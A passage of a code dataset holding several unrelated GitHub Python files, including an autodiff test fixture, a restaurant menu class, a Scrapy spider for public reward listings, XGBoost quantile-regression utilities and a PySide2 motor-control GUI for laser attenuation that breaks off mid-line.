singular_argproxy_dat(adx):\n\n x = fake.Value()\n args = arepeat(fake.Value, 4)\n args1 = {\n 0: lambda: (x, args[1], args[2], args[3]),\n 1: lambda: (args[0], x, args[2], args[3]),\n 2: lambda: (args[0], args[1], x, args[3]),\n 3: lambda: (args[0], args[1], args[2], x),\n }[adx]()\n\n argproxy = nary.ArgProxySingular(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n\n\ndef plural_argproxy_dat(adx):\n\n x = arepeat(fake.Value, len(adx))\n args = arepeat(fake.Value, 4)\n args1 = {\n (1,): lambda: (args[0], x[0], args[2], args[3]),\n (0,1): lambda: (x[0], x[1], args[2], args[3]),\n (1,3): lambda: (args[0], x[0], args[2], x[1]),\n (0,2,3): lambda: (x[0], args[1], x[1], x[2]),\n (0,3): lambda: (x[0], args[1], args[2], x[1]),\n }[adx]()\n\n argproxy = nary.ArgProxyPlural(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n \n\ndef singular_argproxy_dat_001():\n\n adx = 0\n\n x = fake.Value()\n args = tuple()\n args1 = (x,)\n\n argproxy = nary.ArgProxySingular(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1)\n\n\n\n\ndef plural_argproxy_dat_001():\n\n adx = (0,1)\n\n x = arepeat(fake.Value, len(adx))\n args = tuple()\n args1 = tuple(x)\n\n argproxy = nary.ArgProxyPlural(adx)\n\n return ArgProxyData(argproxy, adx, x, args, args1) \n\n\n\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tests/autodiff/data/nary.py","file_name":"nary.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28705507865","text":"from item import Item\nfrom drink import Drink\nfrom food import Food\n\n\nclass Menu:\n def __init__(self, restaurant_name, address, drinks=None, foods=None):\n self.restaurant_name = restaurant_name\n self.address = address\n self.drinks = drinks if drinks else []\n self.foods = foods if foods else []\n\n def __str__(self):\n return f'{self.restaurant_name}\\n{self.address}\\n\\nНапитки:\\n{self._print_items(self.drinks)}\\n\\nБлюда:\\n{self._print_items(self.foods)}'\n\n def __len__(self):\n return len(self.drinks) + len(self.foods)\n\n def __getitem__(self, index):\n if index < len(self.drinks):\n return self.drinks[index]\n else:\n return self.foods[index - len(self.drinks)]\n\n def __setitem__(self, index, item):\n if index < len(self.drinks):\n self.drinks[index] = item\n else:\n self.foods[index - len(self.drinks)] = item\n\n def __delitem__(self, index):\n if index < len(self.drinks):\n del self.drinks[index]\n else:\n del self.foods[index - len(self.drinks)]\n\n def __add__(self, other):\n if isinstance(other, Drink):\n self.drinks.append(other)\n elif isinstance(other, Food):\n self.foods.append(other)\n else:\n raise TypeError(\"В меню можно добавить лишь напитки либо блюда\")\n\n return self\n\n def __sub__(self, other):\n if isinstance(other, Drink):\n self.drinks.remove(other)\n elif isinstance(other, Food):\n self.foods.remove(other)\n else:\n raise TypeError(\"В меню можно добавить лишь напитки либо блюда\")\n\n return self\n\n def create_txt_file(self, file_path):\n with open(file_path, 'w') as f:\n f.write(str(self))\n for drink in self.drinks:\n f.write('\\n\\n' + str(drink))\n for food in self.foods:\n f.write('\\n\\n' + str(food))\n\n def _print_items(self, items):\n return '\\n'.join([str(item) for item in items])\n","repo_name":"gr1fxn/MIREA","sub_path":"1 курс/2 семестр/Ознакомительная практика/Тема C/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40225734080","text":"import scrapy\nimport datetime\nimport re\nimport posixpath\nfrom pst_ag_project.items import PostDetails\nfrom twisted.internet.error import DNSLookupError\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import TimeoutError, TCPTimedOutError\nfrom scrapy.crawler import CrawlerProcess\n\nscraped_post_list = []\n\n\nclass RwjstspiderSpider(scrapy.Spider):\n name = \"rwjstspider\"\n allowed_domains = [\"rewardsforjustice.net\"]\n start_urls = [\"http://rewardsforjustice.net/\"]\n\n payload = \"action=jet_engine_ajax&handler=get_listing&page_settings%\"\\\n \"5Bpost_id%5D=22076&page_settings%5Bqueried_id%5D=22076%7CWP_Post&page_\"\\\n \"settings%5Belement_id%5D=ddd7ae9&page_settings%5Bpage%5D=1&listing_type=ele\"\\\n \"mentor&isEditMode=false&addedPostCSS%5B%5D=22078\"\n\n headers = {\n \"authority\": \"rewardsforjustice.net\",\n \"accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"accept-language\": \"en-US,en;q=0.9,my-ZG;q=0.8,my;q=0.7\",\n \"cache-control\": \"no-cache\",\n \"content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"cookie\": \"_ga=GA1.1.2132662955.1681741987; cookie_notice_accepted=true; wp-wpml_current_language=en; _ga_BPR2J8V0QK=GS1.1.1681801651.5.1.1681802357.0.0.0\",\n \"origin\": \"https://rewardsforjustice.net\",\n \"pragma\": \"no-cache\",\n \"referer\": \"https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=crime-category:1070%2C1071%2C1073%2C1072%2C1074\",\n \"sec-ch-ua\": '\"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"',\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": '\"macOS\"',\n \"sec-fetch-dest\": \"empty\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\",\n \"x-requested-with\": \"XMLHttpRequest\",\n }\n\n url = \"https://rewardsforjustice.net/index/?jsf=jet-engine%3Arewards-grid&tax=crime-category%3A1070%2C1071%2C1073%2C1072%2C1074\"\n\n def parse(self, response):\n request = scrapy.Request(\n url=self.url,\n callback=self.parse_api,\n headers=self.headers,\n body=self.payload,\n method=\"POST\",\n errback=self.errback_httpbin,\n )\n\n yield request\n\n def parse_api(self, response):\n \"\"\"To make request and get individual urls for each post\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n response object: A json response containing all links for a particular page\n \"\"\"\n base_url = self.url\n json_response = response.json()\n total_num_of_pages = json_response[\"data\"][\"filters_data\"][\"props\"][\n \"rewards-grid\"\n ][\"max_num_pages\"]\n\n for page_number in range(1, total_num_of_pages + 1):\n path = f\"&pagenum={page_number}\"\n url = posixpath.join(base_url, path)\n\n yield scrapy.Request(\n url=url,\n callback=self.parse_links,\n headers=self.headers,\n body=self.payload,\n method=\"POST\",\n errback=self.errback_httpbin,\n )\n\n def parse_links(self, response):\n \"\"\"To make request to each post url and get page element\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n response object: A response containing page elements\n \"\"\"\n json_response = response.json()\n string = json_response[\"data\"][\"html\"]\n pattern = 'data-url=\"https://rewardsforjustice.net/rewards/.*/'\n all_links = re.findall(pattern, string)\n clean_links = list(map(lambda x: x.split('=\"')[1], all_links))\n\n for post_link in clean_links[0:2]:\n yield scrapy.Request(url=post_link, callback=self.parse_post)\n\n def parse_post(self, response):\n \"\"\"To get datapoints from page element\n\n Args:\n response (response_object): scrapy response object\n\n Yields:\n post_details: A dictionary of scraped post details\n \"\"\"\n post_details = PostDetails()\n try:\n image_div_class = response.xpath(\n \"//h2[text()='Images:']//parent::div//parent::\"\\\n \"div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n image_divs = response.xpath(\n f\"//div[contains(@class, '{image_div_class}')]//figure\"\n )\n image_urls = [element.css(\"img\").attrib[\"src\"] for element in image_divs]\n except KeyError:\n image_urls = None\n\n try:\n dob_class = response.xpath(\n \"//h2[text()='Date of Birth:']//parent::div//parent::\"\\\n \"div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n dob = response.xpath(\n f\"//div[contains(@class, '{dob_class}')]/div/text()\"\n ).get()\n except KeyError:\n dob = None\n\n try:\n ass_loc_class = response.xpath(\n \"//h2[contains(text(),'Associated Location')]//parent::\"\\\n \"div//parent::div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n ass_loc = response.xpath(\n f\"//div[contains(@class, '{ass_loc_class}')]//div//div/span/text()\"\n ).getall()\n except KeyError:\n ass_loc = None\n\n try:\n ass_org_class = response.xpath(\n \"//h2[contains(text(),'Associated Organization')]//parent::\"\\\n \"div//parent::div//following-sibling::div[starts-with(@class, 'elementor-element')]\"\n ).attrib[\"class\"]\n ass_org = response.xpath(\n f\"//div[contains(@class, '{ass_org_class}')]//div/text()\"\n ).get()\n except KeyError:\n try:\n ass_org_class = response.xpath(\n \"//p[contains(text(),'Associated Organization')]\"\n )\n ass_org = ass_org_class.css(\"a::text\").get()\n except Exception:\n ass_org = None\n\n post_details[\"url\"] = response.url\n post_details[\"category\"] = response.css(\n \"span.jet-listing-dynamic-terms__link::text\"\n ).get()\n post_details[\"title\"] = response.css(\"h2::text\").get()\n post_details[\"reward_amount\"] = response.xpath(\n '//h2[contains(text(), \"Up to\")]/text()'\n ).get()\n post_details[\"associated_organization\"] = ass_org\n post_details[\"associated_location\"] = ass_loc\n post_details[\"about\"] = response.xpath(\n \"//div[@data-widget_type='theme-post-content.default']//child::div//p/text()\"\n ).getall()\n post_details[\"image_urls\"] = image_urls\n post_details[\"date_of_birth\"] = dob\n\n scraped_post_list.append(post_details)\n yield post_details\n\n def errback_httpbin(self, failure):\n \"\"\"To log API errors\n\n Args:\n failure: failure object\n \"\"\"\n\n self.logger.error(repr(failure))\n\n if failure.check(HttpError):\n response = failure.value.response\n self.logger.error(\"HttpError on %s\", response.url)\n\n elif failure.check(DNSLookupError):\n request = failure.request\n self.logger.error(\"DNSLookupError on %s\", request.url)\n\n elif failure.check(TimeoutError, TCPTimedOutError):\n request = failure.request\n self.logger.error(\"TimeoutError on %s\", request.url)\n\n\n\n","repo_name":"priye-1/airflow_data_pipeline","sub_path":"dags/scraper/pst_ag_project/pst_ag_project/spiders/rwjst_spider.py","file_name":"rwjst_spider.py","file_ext":"py","file_size_in_byte":7799,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"38195814310","text":"import logging\nimport time\n\nfrom variables import RSSI_SIZE_BYTES, SCANNER_ID_SIZE_BYTES\n\ndef deserialize(buffer):\n curr_byte = 0\n \n # normalize buffer comming from dbus\n buffer = [int(value) for value in buffer]\n\n scanner_id = buffer[curr_byte]\n curr_byte += SCANNER_ID_SIZE_BYTES\n\n mac_size = buffer[curr_byte]\n curr_byte += 1\n\n num_rssi = buffer[curr_byte]\n curr_byte += 1\n\n result = {\n 'scanner_id': scanner_id,\n 'last_batch': last_batch(buffer, mac_size, num_rssi),\n 'timestamp': time.time(),\n }\n \n if len(buffer) > (mac_size + (RSSI_SIZE_BYTES * num_rssi)) + SCANNER_ID_SIZE_BYTES:\n device_scans = {}\n while curr_byte + (num_rssi * RSSI_SIZE_BYTES) + mac_size < len(buffer):\n mac_address = deserialize_mac(buffer[curr_byte:(curr_byte+mac_size)])\n curr_byte += mac_size\n rssis = []\n curr_rssi = 0\n while curr_rssi < num_rssi:\n rssis += [-(buffer[curr_byte])]\n curr_byte += RSSI_SIZE_BYTES\n curr_rssi += 1\n\n device_scans[mac_address] = rssis\n\n result['devices'] = device_scans\n\n logging.debug(f'Deserialized the following values: {result}')\n \n return result\n\ndef deserialize_mac(buffer):\n mac_hex = [format(value, '02x') for value in buffer]\n return ':'.join(mac_hex).lower()\n\ndef last_batch(buffer, mac_size, num_rssi):\n buffer_len = len(buffer)\n # subtract scanner ID from buffer\n buffer_len -= 3\n return buffer_len % (mac_size + (RSSI_SIZE_BYTES * num_rssi)) != 0","repo_name":"frederico-apolonia/boa","sub_path":"scanner-gateway/ble/src/deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73922072488","text":"# You have a graph of n nodes. You are given an integer n and an array edges where edges[i] = [ai, bi] indicates that there is an edge between ai and bi in the graph.\n\n# Return the number of connected components in the graph.\n\n \n\n# Example 1:\n\n\n# Input: n = 5, edges = [[0,1],[1,2],[3,4]]\n# Output: 2\n# Example 2:\n\n\n# Input: n = 5, edges = [[0,1],[1,2],[2,3],[3,4]]\n# Output: 1\n \n\n# Constraints:\n\n# 1 <= n <= 2000\n# 1 <= edges.length <= 5000\n# edges[i].length == 2\n# 0 <= ai <= bi < n\n# ai != bi\n# There are no repeated edges.\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n arr = [i for i in range(n)]\n\n def find(x):\n nonlocal arr\n return x if arr[x] == x else find(arr[x])\n\n def union(x, y):\n nonlocal arr\n arr[find(x)] = find(y)\n\n for [x, y] in edges:\n union(x, y)\n\n return len([1 for idx, item in enumerate(arr) if idx == item])\n\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n uniq_set = set()\n res = 0\n\n def dfs(i, pairs):\n nonlocal uniq_set\n if i in pairs:\n for j in pairs[i]:\n if not j in uniq_set:\n uniq_set.add(j)\n dfs(j, pairs)\n\n pairs = {}\n for [x, y] in edges:\n if not x in pairs:\n pairs[x] = set()\n if not y in pairs:\n pairs[y] = set()\n pairs[x].add(y)\n pairs[y].add(x)\n\n for i in range(n):\n if not i in uniq_set:\n res += 1\n dfs(i, pairs)\n return res\n","repo_name":"jHuang30/Ds-and-Algo-in-Python","sub_path":"323. Number of Connected Components in an Undirected Graph.py","file_name":"323. Number of Connected Components in an Undirected Graph.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7730781566","text":"import random\nimport pandas as pd\nimport numpy as np\nfrom functools import partial\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.preprocessing import MinMaxScaler\nfrom xgboost.sklearn import XGBRegressor\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\n\ndef generate_data():\n x,y= load_boston(return_X_y=True)\n x_train, x_val, y_train, y_val=train_test_split(x,y,test_size=.2)\n \n return(x_train, x_val, y_train, y_val)\n\n\n\n\n\ndef plot_result(y_val,y_upper,y_lower):\n fig = plt.figure(figsize=(12,6))\n x_point=range(y_val.shape[0])\n pic_data=pd.DataFrame({'y':y_val,'upper':y_upper,'lower':y_lower}).sort_values('y')\n plt.plot(x_point,pic_data['y'], 'g:')\n plt.plot(x_point, pic_data['upper'], 'k-')\n plt.plot(x_point, pic_data['lower'], 'k-')\n plt.fill(np.concatenate([x_point, x_point[::-1]]),\n np.concatenate([pic_data['upper'], pic_data['lower'][::-1]]),\n alpha=.5, fc='r', ec='None')\n\n\n\n\n\ndef predict_interval(x_train,y_train,x_val,model,alpha=.9,xgb=False):\n \n model.fit(x_train,y_train)\n y_pred=model.predict(x_val)\n \n if xgb :\n model.set_params(loss='quantile', quant_alpha=alpha)\n model.set_params(loss='quantile', alpha=alpha)\n model.fit(x_train,y_train)\n y_upper= model.predict(x_val) \n \n if xgb :\n model.set_params(loss='quantile', quant_alpha=1-alpha)\n model.set_params(loss='quantile', alpha=1-alpha)\n model.fit(x_train,y_train)\n y_lower= model.predict(x_val)\n \n return(y_upper,y_lower)\n\n\n\n\n\nclass XGBQuantile(XGBRegressor):\n def __init__(self,quant_alpha=0.95,quant_delta = 1.0,quant_thres=1.0,quant_var =1.0,base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bytree=1, gamma=0, learning_rate=0.1, max_delta_step=0,max_depth=3, min_child_weight=1, missing=None, n_estimators=100,\n n_jobs=1, nthread=None, objective='reg:linear', random_state=0,reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,silent=True, subsample=1):\n self.quant_alpha = quant_alpha\n self.quant_delta = quant_delta\n self.quant_thres = quant_thres\n self.quant_var = quant_var\n \n super().__init__(base_score=base_score, booster=booster, colsample_bylevel=colsample_bylevel,\n colsample_bytree=colsample_bytree, gamma=gamma, learning_rate=learning_rate, max_delta_step=max_delta_step,\n max_depth=max_depth, min_child_weight=min_child_weight, missing=missing, n_estimators=n_estimators,\n n_jobs= n_jobs, nthread=nthread, objective=objective, random_state=random_state,\n reg_alpha=reg_alpha, reg_lambda=reg_lambda, scale_pos_weight=scale_pos_weight, seed=seed,\n silent=silent, subsample=subsample)\n \n self.test = None\n \n def fit(self, X, y):\n super().set_params(objective=partial(XGBQuantile.quantile_loss,alpha = self.quant_alpha,delta = self.quant_delta,threshold = self.quant_thres,var = self.quant_var) )\n super().fit(X,y)\n return self\n \n def predict(self,X):\n return super().predict(X)\n \n def score(self, X, y):\n y_pred = super().predict(X)\n score = XGBQuantile.quantile_score(y, y_pred, self.quant_alpha)\n score = 1./score\n return score\n \n @staticmethod\n def quantile_loss(y_true,y_pred,alpha,delta,threshold,var):\n x = y_true - y_pred\n grad = (x<(alpha-1.0)*delta)*(1.0-alpha)- ((x>=(alpha-1.0)*delta)& (x<alpha*delta) )*x/delta-alpha*(x>alpha*delta)\n hess = ((x>=(alpha-1.0)*delta)& (x<alpha*delta) )/delta \n \n# grad = (np.abs(x)<threshold )*grad - (np.abs(x)>=threshold )*(2*np.random.randint(2, size=len(y_true)) -1.0)*var\n# hess = (np.abs(x)<threshold )*hess + (np.abs(x)>=threshold )\n return grad, hess\n \n @staticmethod\n def original_quantile_loss(y_true,y_pred,alpha,delta):\n x = y_true - y_pred\n grad = (x<(alpha-1.0)*delta)*(1.0-alpha)-((x>=(alpha-1.0)*delta)& (x<alpha*delta) )*x/delta-alpha*(x>alpha*delta)\n hess = ((x>=(alpha-1.0)*delta)& (x<alpha*delta) )/delta \n return grad,hess\n\n \n @staticmethod\n def quantile_score(y_true, y_pred, alpha):\n score = XGBQuantile.quantile_cost(x=y_true-y_pred,alpha=alpha)\n score = np.sum(score)\n return score\n \n @staticmethod\n def quantile_cost(x, alpha):\n return (alpha-1.0)*x*(x<0)+alpha*x*(x>=0)\n \n @staticmethod\n def get_split_gain(gradient,hessian,l=1):\n split_gain = list()\n for i in range(gradient.shape[0]):\n split_gain.append(np.sum(gradient[:i])**2/(np.sum(hessian[:i])+l)+np.sum(gradient[i:])**2/(np.sum(hessian[i:])+l)-np.sum(gradient)**2/(np.sum(hessian)+l) )\n \n return np.array(split_gain)\n\n\n\n","repo_name":"z888888861/Quantile_Regression","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22801848257","text":"import unittest\nimport tensorflow as tf\n#from thesis_models.krpn_model import load_and_reshape\nfrom thesis_models.path_hier_att_model import scaled_dot_attention, mask_tensor\nimport numpy as np\n\n\nclass KRPNTest(unittest.TestCase):\n\n def test_load_and_reshape(self):\n success = True\n\n self.assertEqual(success, True)\n\n\ndef test_scaled_dot_attention():\n batch_size, num_paths, path_length, dim = 2, 3, 3, 2\n\n # test first attention computation; rank 4 tensors\n path_embs = np.ones((batch_size, num_paths, path_length, dim))\n ext_emb = 2 * np.ones((batch_size, dim))\n with tf.Session() as sess:\n x = tf.constant(path_embs, tf.float32)\n y = tf.constant(ext_emb, tf.float32)\n y = tf.expand_dims(tf.expand_dims(y, 1), 2)\n y = tf.broadcast_to(y, [batch_size, num_paths, 1, dim])\n\n att_val = scaled_dot_attention(y, x)\n y, att_val = sess.run([y, att_val])\n assert att_val.shape == (batch_size, num_paths, 1, dim)\n\n # test second attention computation; rank 3 tensors\n path_embs = np.ones((batch_size, num_paths, dim))\n ext_emb = 2 * np.ones((batch_size, dim))\n with tf.Session() as sess:\n x = tf.constant(path_embs, tf.float32)\n y = tf.constant(ext_emb, tf.float32)\n y = tf.expand_dims(y, 1)\n y = tf.broadcast_to(y, [batch_size, 1, dim])\n\n att_val = scaled_dot_attention(y, x)\n y, att_val = sess.run([y, att_val])\n assert att_val.shape == (batch_size, 1, dim)\n\n\ndef test_mask_tensor():\n\n x = np.ones((3, 3))\n y = np.array([0, 1, 0])\n\n masked_correct = np.zeros((3, 3))\n masked_correct[1] = np.ones(3)\n\n with tf.Session() as sess:\n x = tf.constant(x, tf.float32)\n y = tf.constant(y, tf.float32)\n\n masked_x = mask_tensor(x, y)\n\n masked_x = sess.run(masked_x)\n\n assert np.all(np.equal(masked_x, masked_correct))\n assert np.all(np.equal(masked_x, x)) == False\n","repo_name":"AndSt/thesis_models","sub_path":"tests/test_path_hier_att_model.py","file_name":"test_path_hier_att_model.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3043628676","text":"from dis import dis\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QMessageBox, QLineEdit\nfrom PySide2 import QtCore\nfrom PySide2.QtCore import Qt, QTimer, Signal \nfrom PySide2.QtUiTools import QUiLoader\nfrom command import Command\nfrom set_magnification import InputDialog\nfrom sub_1 import Final\nfrom angle_data import angleData\nimport serial\nimport os\n\npath = \"./main.ui\"\ncom = Command()\nuartport = \"/dev/ttyUSB0\"\n#uartport = \"COM10\"\nclass MyLineEdit(QLineEdit):#修改QlineEdit的觸發信號\n clicked = Signal()\n def mouseReleaseEvent(self, QMouseEvent):\n if QMouseEvent.button()==Qt.LeftButton:\n self.clicked.emit()\nclass Stats(QMainWindow):\n def __init__(self):\n \n\n super().__init__()\n self.ui =QUiLoader().load(path)\n self.ui.setWindowFlags(Qt.Window | Qt.FramelessWindowHint) #使其無邊框\n self.ui.resize(800,480)\n self.ui.move(0,0)\n \n self.ui.Stop.clicked.connect(self.stop)\n self.ui.Start.clicked.connect(self.start)\n self.ui.Shutdown.clicked.connect(self.shutdown)\n self.ui.Select.clicked.connect(self.select)\n self.ui.Backhome.clicked.connect(self.backhome)\n self.ui.Clean.clicked.connect(self.clean)\n\n #修改QLinetext的觸發屬性\n self.ui.Theoretical_distance = MyLineEdit(self.ui.Theoretical_distance)\n self.ui.Theoretical_distance.clicked.connect(self.set_Theoretical_distance)\n self.Theoretical_distance = 10000\n self.ui.Theoretical_distance.setText(str(self.Theoretical_distance)) \n\n self.ui.Measure_distance = MyLineEdit(self.ui.Measure_distance)\n self.ui.Measure_distance.clicked.connect(self.set_Measure_distance)\n self.Measure_distance = 100\n self.ui.Measure_distance.setText(str(self.Measure_distance)) \n #===========================================================#\n\n self.ui.Display.setText(\"歡迎使用雷射衰減程式\\n\")\n \n self.ui.show()\n self.timer = QTimer()\n\n self.initialization_hardware()\n\n #內部參數設定\n self.uarttime = 1000 #Uart傳輸時間基數\n self.compensate_motor_2 = 105 #馬達二補償角度\n self.compensate_motor_3 = 100 #馬達三補償角度\n self.data = angleData() #取得衰減角度資料\n self.keylist = list(self.data) #將衰減角度鍵值轉為清單\n self.key_num = 0 #設定list數為0\n self.magnification = self.keylist[0] #將衰減倍率預設為零\n\n# 硬體功能\n def initialization_hardware(self):\n #初始化序列阜\n self.ser = serial.Serial(uartport,9600,timeout=1)\n for i in com.scan():\n self.ser.write(bytes(i,encoding='ASCII'))\n\n def move(self,angleData):\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.ma(2,angleData[1]+self.compensate_motor_2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.ma(3,angleData[2]+self.compensate_motor_3),encoding='ASCII')))\n \n def sub(self):\n self.key_num = self.keylist.index(self.magnification)\n if self.key_num == 0:\n self.key_num = 1\n else :\n self.key_num -= 1\n self.magnification = self.keylist[self.key_num]\n angleData = self.data[str(self.magnification)]\n self.display(1000,f\"目前倍率{self.magnification}\")\n self.move(angleData)\n def add(self):\n self.key_num = self.keylist.index(self.magnification)\n if self.key_num >= len(self.keylist)-1:\n self.key_num = len(self.keylist)-1\n else :\n self.key_num += 1\n self.magnification = self.keylist[self.key_num]\n angleData = self.data[str(self.magnification)]\n self.display(1000,f\"目前倍率{self.magnification}\")\n self.move(angleData)\n\n# 功能鍵程式\n def stop(self):\n self.timer.singleShot(self.uarttime*0,lambda:self.ser.write(bytes(com.stop(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.stop(3),encoding='ASCII')))\n self.display(100,\"中止馬達運作\")\n\n def clean(self):\n cleantime = 30000\n self.display(100,\"開始馬達清潔,預計30秒結束\")\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.clean(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.clean(3),encoding='ASCII')))\n self.timer.singleShot(cleantime+2000,lambda:self.ser.write(bytes(com.stop(2),encoding='ASCII')))\n self.timer.singleShot(cleantime+3000,lambda:self.ser.write(bytes(com.stop(3),encoding='ASCII')))\n self.display(cleantime+3000,\"馬達已清潔完成\")\n self.timer.singleShot(cleantime+4000,lambda:self.backhome())\n\n def shutdown(self):\n qm = QMessageBox.question(self.ui,\"您確定要關機\",\"確定嗎?\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if qm == QMessageBox.Yes:\n self.stop()\n self.display(100,\"正在關機...\")\n self.timer.singleShot(1000,lambda:app.quit())\n\n '''\n os.system('cd /home/pi/motor_control/')\n os.system('git pull')\n os.system(\"sudo poweroff\")\n '''\n else:\n self.display(100,\"未完成關機\")\n\n def set_Theoretical_distance(self):\n dialog = InputDialog.getValue(self,\"最大測程\",\"請輸入最大量測距離\",'',100000,0)\n self.setValue = dialog\n self.Theoretical_distance = str(self.setValue)\n self.ui.Theoretical_distance.setText(self.Theoretical_distance)\n\n def set_Measure_distance(self):\n dialog = InputDialog.getValue(self,\"量測距離\",\"請輸入實驗距離\",'',10000,0)\n self.setValue = dialog\n self.Measure_distance = str(self.setValue)\n self.ui.Measure_distance.setText(self.Measure_distance) \n\n def backhome(self):\n self.display(100,\"執行回原點作業\")\n self.display(1000,\"馬達1回原點\")\n self.display(1100,\"馬達2回原點\",1)\n self.display(1200,\"馬達3回原點\",1)\n self.display(3000,\"歡迎使用雷射測距程式\")\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.home(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.home(3),encoding='ASCII')))\n self.magnification = '0x'\n self.key_num = 0\n self.move(self.data[self.magnification])\n self.display(4000,f\"目前倍率{self.magnification}\",1)\n\n @QtCore.Slot()\n def start(self):\n qm = QMessageBox.question(self.ui,\"確認輸入參數正確\",f\"理論距離:{int(int(self.Theoretical_distance)/1000)}公里\\n量測距離:{self.Measure_distance}公尺\\n測試波長:{self.ui.Select_wavelength.currentText()}\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if qm == QMessageBox.Yes:\n if self.ui.Select_wavelength.currentText() == \"1550nm\":\n self.c = 0.731 \n elif self.ui.Select_wavelength.currentText() == \"1064nm\":\n self.c = 0.712\n elif self.ui.Select_wavelength.currentText() == \"905nm\":\n self.c = 0.692\n elif self.ui.Select_wavelength.currentText() == \"808nm\":\n self.c = 0.633\n else:\n self.c = 1\n \n self.display(100,\"開始量測\")\n self.recommend_magnification = int(round(int(self.Theoretical_distance)/int(self.Measure_distance)/1,0))#視情況要不要除以波長倍率self.c\n self.magnification = str(self.recommend_magnification)+'x'\n self.display(200,f\"建議倍率為{self.magnification}\",1)\n self.display(300,f\"正在調整倍率...\",1)\n self.move(self.data[self.magnification])#轉動馬達到指定倍率\n self.display(4000,f\"目前倍率{self.magnification}\",1)\n self.timer.singleShot(4100,lambda:self.limit())\n else:\n self.display(100,\"請確認參數\")\n\n def limit(self):\n q1 = QMessageBox.question(self.ui,\"請確認可否量測\",f\"目前倍率{self.magnification}\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q1 == QMessageBox.Yes:\n self.display(100,\"增加倍率\")\n self.timer.singleShot(1000,lambda:self.add())\n self.timer.singleShot(1500,lambda:self.limit_add())\n else:\n self.display(100,\"減少倍率\")\n self.timer.singleShot(1000,lambda:self.sub())\n self.timer.singleShot(1500,lambda:self.limit_sub())\n\n def limit_add(self):\n while True:\n q_add = QMessageBox.question(self.ui,\"請確認可否量測\",\"請稍後馬達增加倍率\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q_add == QMessageBox.Yes:\n self.timer.singleShot(1000,lambda:self.add())\n else:\n break\n self.display(100,f\"臨界倍率為{self.keylist[self.key_num-1]}\")\n self.magnification = self.keylist[self.key_num-1]\n self.move(self.data[self.magnification])\n self.timer.singleShot(1000,lambda:self.final_test())\n def limit_sub(self):\n while True:\n q_sub = QMessageBox.question(self.ui,\"請確認可否量測\",\"請稍後馬達減少倍率\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q_sub == QMessageBox.No:\n self.timer.singleShot(1000,lambda:self.sub())\n else:\n break\n self.display(100,f\"臨界倍率為{self.keylist[self.key_num]}\")\n self.timer.singleShot(1000,lambda:self.final_test())\n\n def final_test(self):\n dialog = Final.getValue(self,self.magnification)\n if dialog == 0:\n self.display(100,\"使用者取消\")\n self.display(200,\"請重新開始\",1)\n self.backhome()\n elif dialog == 1:\n self.display(100,\"通過臨界倍率測試\")\n temp = int(round(self.recommend_magnification/self.c,0)) #對應波長下應該的衰減倍率\n tm = int(self.magnification.replace('x','')) #實際倍率\n distance = 